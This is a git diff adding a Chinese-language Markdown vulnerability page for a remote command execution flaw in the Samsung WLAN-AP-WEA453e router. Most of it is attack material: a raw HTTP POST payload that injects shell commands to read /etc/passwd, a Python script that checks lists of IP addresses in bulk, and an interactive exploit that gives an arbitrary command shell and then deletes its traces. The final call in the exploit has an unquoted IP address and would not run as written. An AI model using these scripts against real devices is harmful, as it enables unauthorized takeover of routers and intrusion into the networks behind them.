diff --git a/WLAN-AP-WEA453e RCE三星路由器远程命令执行漏洞.md b/WLAN-AP-WEA453e RCE三星路由器远程命令执行漏洞.md new file mode 100644 index 0000000..1b3497d --- /dev/null +++ b/WLAN-AP-WEA453e RCE三星路由器远程命令执行漏洞.md @@ -0,0 +1,153 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|WLAN-AP-WEA453e RCE三星路由器远程命令执行漏洞|2020-8|未知|https://www.Samsung.com| |三星WLAN-AP-WEA453e路由器| + +路由器首页 +![image](https://user-images.githubusercontent.com/86941613/185778437-2e5218e7-68a0-4d60-8f53-2e91c0d576f4.png) + +### 漏洞原理 + +利用burp构造特殊的请求 + +```shell + POST /(download)/tmp/a.txt HTTP/1.1 + Host: xxx.xxx.xxx.xxx + command1=shell:cat /etc/passwd| dd of=/tmp/a.txt +``` +![image](https://user-images.githubusercontent.com/86941613/185778450-ef88e085-aa79-407d-a0ae-bedb50fb53dd.png) + +### POC批量检测代码如下 +```python +#filename: Check.py +#Usage: python3 Check.py ip.txt +import requests +import sys +import datetime + +def CheckVuln(host): + vurl = host+'/(download)/tmp/a.txt' + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','Connection': 'close'} + data = {'command1':'shell:ls|dd of=/tmp/a.txt'} + try: + req = requests.post(url=vurl,data=data,verify=False,headers=headers,timeout=1) + + if req.status_code ==200 and 'root' in req.text: + T = ('[*]-'+host+'-----Vulnerable!') + print(T) + OutPut(T) + else: + T = ('[-]-'+host+'-----Not Vulnnerable') + print(T) + OutPut(T) + + except: + T = host+'[-]-----Network Error' + print(T) + OutPut(T) + +def OutPut(F): + time = datetime.datetime.now().strftime('%Y-%m-%d') + #print(time) + f = open(time+'.txt','a') + f.write(F + '\n') + f.close() + +def GetUrl(path): + with open(path,'r',encoding='utf-8') as f: + for i in f: + if i.strip() != '': + oldh = i.strip() + #print(oldh) + host = 'http://'+oldh + CheckVuln(host) + + else: + print(path+'Empty File') + +if len(sys.argv) != 2: + print('-------------Usage:python3 Check.py ip.txt----------------- ') + sys.exit() + +path = sys.argv[1] + +GetUrl(path) + +``` +### EXP +```python +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +import requests +import sys +import os +from urllib3.exceptions import InsecureRequestWarning + +class exp: + def Checking(self): + try: + Url = self.target + "(download)/tmp/hello.txt" + CkData = "command1=shell:cat /etc/passwd| dd of=/tmp/hello.txt" + response = requests.post(url = Url,data = CkData,verify = False,timeout = 20) + if(response.status_code == 200 and 'root:' in response.text): + return True + else: + return False + except Exception as e: + #print("checking") + print("[-] Server Error!") + + def Exploit(self): + Url = self.target + "(download)/tmp/hello.txt" + while True: + try: + command = input("# ") + if(command == 'exit'): + self.Clean() + sys.exit() + if(command == 'cls'): + os.system("cls") + continue + data = "command1=shell:" + command + "| dd of=/tmp/hello.txt" + response = requests.post(url = Url,data = data,verify = False,timeout = 20) + if(response.text == None): + print("[!] Server reply nothing") + else: + print(response.text) + except KeyboardInterrupt: + self.Clean() + exit() + except Exception as e: + print("[-] Server not suport this command") + + def Clean(self): + Url = self.target + "(download)/tmp/hello.txt" + try: + CleanData = "command1=shell:busybox rm -f /tmp/hello.txt" + response = requests.post(url = Url,data = CleanData,verify = False,timeout = 10) + + if(response.status_code == 200): + print("[+] Clean target successfully!") + sys.exit() + else: + print("[-] Clean Failed!") + except Exception as e: + print("[-] Server error!") + + def __init__(self,target,port): + self.target=target + requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + + if(len(sys.argv) == 3): + module = sys.argv[2] + if(module == 'clean'): + self.Clean() + else: + print("[-] module error!") + + while self.Checking() is True: + self.Exploit() + +exp(192.168.10.1,80) +```